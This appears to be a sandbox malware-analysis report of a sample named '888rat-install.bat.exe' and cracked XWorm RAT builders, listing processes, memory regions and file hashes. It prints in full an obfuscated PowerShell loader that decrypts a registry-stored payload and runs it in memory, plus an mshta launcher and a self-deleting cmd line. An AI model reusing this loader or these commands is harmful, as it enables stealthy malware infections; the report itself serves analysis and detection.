'').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5108 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4944 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8e7864dd-ec75-4498-ae93-789111ee90ef}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{51fac0a2-0601-4b32-9b41-c082947eb8c1}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{9eee3641-dc1b-495d-b650-3eecbd79cf09}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{1a5d9ebd-971c-4ad6-8a72-3306c57d17b8}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & del /f "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & exit

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{fc9aad12-f1c9-4ce6-846c-c0f689a5ffb5}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{7fa76853-40fe-4e4c-991b-dd8d66d2a063}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & del /f "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & exit

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap26095:100:7zEvent18962

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe"

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 132

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 252

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 132

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto

Files


memory/3632-932-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-933-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/3632-934-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

memory/3632-939-0x0000021F7D7A0000-0x0000021F7D7B0000-memory.dmp

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4264-941-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-942-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-943-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-944-0x0000012AB5E50000-0x0000012AB5E74000-memory.dmp

memory/4264-947-0x0000012AB6070000-0x0000012AB6080000-memory.dmp

memory/4264-948-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-950-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

memory/4264-952-0x0000012ACEA40000-0x0000012ACF490000-memory.dmp

memory/4264-953-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-954-0x0000012ACE530000-0x0000012ACE5D6000-memory.dmp

memory/4264-969-0x0000012ACE5E0000-0x0000012ACE636000-memory.dmp

memory/4264-970-0x0000012ACF490000-0x0000012ACF4E8000-memory.dmp

memory/4264-971-0x0000012AB5E70000-0x0000012AB5E92000-memory.dmp

memory/4264-975-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4264-983-0x0000012AB5E90000-0x0000012AB5E9A000-memory.dmp

memory/5024-984-0x0000000140000000-0x0000000140004000-memory.dmp

memory/5024-987-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4392-988-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4392-990-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3632-993-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4264-994-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

C:\Windows\$sxr-powershell.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4264-1012-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

memory/4264-1016-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

C:\Windows\$sxr-powershell.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4580-1026-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4580-1030-0x000002657C2E0000-0x000002657C2F0000-memory.dmp

memory/4580-1032-0x000002657C2E0000-0x000002657C2F0000-memory.dmp

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/3556-1050-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/3556-1052-0x0000019E340F0000-0x0000019E34100000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 2143b379fed61ab5450bab1a751798ce
SHA1 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256 a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020

MD5 68d78ba6f8244d82ba25b0a9939a9ef2
SHA1 9a523496ce943d157fc480c6032eb78d952a4d2d
SHA256 486c3f7d552037ad00ee56024785ce43a32ce1b39cd542addc74d5dafa1a8162
SHA512 fa8f80e3bac80fb49d1d1810d113a1512e2fbf9189dff4865d111946dc7f922fc59c9db5d26a43b4ed145d332c5e8f2faba60dcd0dec52616ead9f8e8ef59511

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

MD5 368739223c6b1103283374f6d1ec955d
SHA1 9366173ed035fb0463aacafeed70a63bd5135e7a
SHA256 73bad371be53b46b67f62af88bd69e27b9a66c277b0d6f55ab4fccb8c6fe15b7
SHA512 20acc575285745bc32085a426573337df95320798510949953c686360123ff069671f2b6662471614ec26e10904f58d8fc2dc37f75d78c354c76a5835ff9084d

memory/3556-1189-0x0000019E340F0000-0x0000019E34100000-memory.dmp

memory/4580-1194-0x000002657C2E0000-0x000002657C2F0000-memory.dmp

memory/4580-1195-0x000002657C680000-0x000002657C6A4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

MD5 462639c8675c3519f631fac077625bc6
SHA1 9299ca8e2880b52555d98040b2cb8dbec7874dd0
SHA256 c619353bf230f37a154a98804b722d19e184ad025d89c5af33863b4448fb3a8a
SHA512 149518798672ff70598194e40823b4525ac8909e6302cce472ed2b7b9e1ba614f375e34d3791343b42acf5db2114b5daefcfc1a78323b083bdb04a9df558650b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

MD5 1e2cd195e4dd85345688ad961c121acc
SHA1 e4ca4fba5b4bc18018a41211177fbe2e4af326ca
SHA256 a3db0da8806176bd799547ff64a1371df6a2e0d53027cb26e74e5313d08e3ca0
